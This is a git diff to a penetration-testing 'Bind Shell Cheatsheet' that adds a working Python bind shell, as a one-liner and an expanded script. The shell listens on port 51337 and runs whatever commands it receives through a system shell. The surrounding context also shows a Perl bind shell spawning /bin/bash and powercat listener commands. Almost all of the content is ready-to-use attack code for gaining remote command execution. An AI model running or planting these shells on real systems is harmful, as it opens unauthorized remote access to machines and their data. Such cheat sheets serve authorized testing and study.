diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md index 73df69d..399c358 100644 --- a/Methodology and Resources/Bind Shell Cheatsheet.md +++ b/Methodology and Resources/Bind Shell Cheatsheet.md @@ -22,6 +22,30 @@ bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' ``` +## Python + +Single line : +```python +python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' +``` + +Expanded version : + +```python +import socket as s,subprocess as sp; + +s1 = s.socket(s.AF_INET, s.SOCK_STREAM); +s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); +s1.bind(("0.0.0.0", 51337)); +s1.listen(1); +c, a = s1.accept(); + +while True: + d = c.recv(1024).decode(); + p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); + c.sendall(p.stdout.read()+p.stderr.read()) +``` + ## PHP ```php @@ -68,4 +92,4 @@ powercat -l -p 7002 -ep # Connect from attacker . .\powercat.ps1 powercat -c 127.0.0.1 -p 7002 -``` \ No newline at end of file +```